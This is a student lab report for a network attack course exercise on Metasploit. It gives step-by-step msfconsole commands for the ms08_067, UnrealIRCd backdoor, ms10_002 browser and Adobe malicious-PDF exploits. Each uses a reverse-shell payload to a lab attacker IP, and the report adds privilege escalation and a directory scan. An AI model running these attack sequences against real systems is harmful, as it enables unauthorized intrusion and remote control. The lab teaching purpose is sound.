码迷,mamicode.com
首页 > 其他好文 > 详细

2019-2020-2 20174325叶竞蔚《网络对抗技术》Exp6 MSF基础应用

时间:2020-04-29 23:57:20      阅读:152      评论:0      收藏:0      [点我收藏+]

标签:pre   show   hand   number   进入   开始   asp   服务   erp   

 

实验目标

掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。

实验内容 

<i> 一个主动攻击实践,如ms08_067; 

<ii> 一个针对浏览器的攻击,如ms11_050;

<iii> 一个针对客户端的攻击,如Adobe;

<iv> 成功应用任何一个辅助模块。

基础问答

<i> 用自己的话解释什么是exploit,payload,encode.

· exploit——工具:用来连接漏洞,渗透攻击模块,将payload传送到靶机中

· payload——载荷:是目标系统在被exploit传送之后,在靶机上面运行的攻击代码

· encode——编码:用来包装payload、改变特征码,不让杀软轻易发现payload就是攻击代码

实验步骤

任务一主动攻击

1.ms08-067_netapi:自动化漏洞溢出攻击

靶机ip:192.168.31.101

攻击机ip:192.168.31.185

<i> 在kali端输入msfconsole,进入MSF控制台

<ii>输入search ms08-067查找可利用模块技术图片

<iii>输入use exploit/windows/smb/ms08_067_netapi启用该模块

<iv>输入info查看靶机适用范围技术图片

<v>输入set payload windows/meterpreter/reverse_tcp选择攻击模块

<vi>输入set RHOSTS 192.168.31.101定靶机IP地址

<vii>输入set LHOST 192.168.31.185设定攻击机IP地址

<viii>输入set LPORT 4325设定端口

<ix> 输入run运行技术图片

连接成功。

2.unrealiRcd后门漏洞

 

<i>输入msfconsole,进入MSF控制台

<ii> 输入search Unreal IRCD搜索Unreal IRCD相关利用模块技术图片

<iii>输入use exploit/unix/irc/unreal_ircd_3281_backdoor使用此模块

<iv>输入show payloads查看可用的payload

<v>输入set payload cmd/unix/reverse_perl选择并使用此payload技术图片

<vi>输入set RHOSTS 192.168.31.38设置靶机IP

<v>输入set LHOST 192.168.31.185 设置回连IP

<vi>输入set LPORT 4325设置回连端口

<vii>输入run运行技术图片

连接成功。

 

任务二针对浏览器的攻击:ms10-002

 

<i>在msfconsole中输入search ms10-002查找并使用相关模块技术图片

<ii>输入use exploit/windows/browser/ms10_002_aurora选择使用板块

<iii>输入set payload windows/meterpreter/reverse_tcp设置payload

<iv>输入 set SRVPORT 77 设置提供服务的端口 

<v> 输入set URIPATH / 设置被攻击机访问的URI路径技术图片

<vi>在XP中打开IE浏览器,输入http://192.168.31.185:77/技术图片

连接成功。

<vii>对主机尝试提权技术图片

提权成功。

 

 

任务三针对客户端的攻击

<i>进入msf控制台,输入use windows/fileformat/adobe_cooltype_sing 选择攻击模式

<ii>输入set payload windows/meterpreter/reverse_tcp

<iii>输入set LHOST 192.168.31.158 kali的IP地址

<iv>输入set LPORT 4325

<v>输入set FILENAME yjw4325.pdf可以指定生成pdf的名字,默认为msf.pdf

<vi>输入exploit发起攻击技术图片

<vii>将生成的pdf文件拖进xp

<viii>回到kali,输入back退出当前板块 

<ix>输入use exploit/multi/handler 启用监听模块

<x>输入set payload windows/meterpreter/reverse_tcp

<xi>输入set LHOST 192.168.31.185 kali的IP地址

<xii>输入set LPORT 4325

<xiii>输入exploit 开始监听

技术图片

 

<xiiii>在xp中打开pdf文件,连接成功。

 

任务四辅助模块攻击

<i>在msf控制台里输入use uxiliary/scanner/http/dir_scanner使用dir_scanner辅助模块

<ii>输入set RHOSTS 192.168.31.101设置要扫描的IP,此处是我此次实验用的xp虚拟机IP

<iii>输入set THREADS 30 设置线程

<iv>输入exploit技术图片

 

实验体会

此次实验较为简单,主要出问题的地方是由于我使用的是xp虚拟机,所以在安装AdobeReader的时候反反复复了很多次都没能安装上,此次实验主要是对于msf的一些简单的运用,通过不同的攻击要求,更加为全面的让我们来掌握如何使用它,总的来说,也让我收获了一些作为黑客的入门,收益颇丰。

 

2019-2020-2 20174325叶竞蔚《网络对抗技术》Exp6 MSF基础应用

标签:pre   show   hand   number   进入   开始   asp   服务   erp   

原文地址:https://www.cnblogs.com/lovelonglive7/p/12805511.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!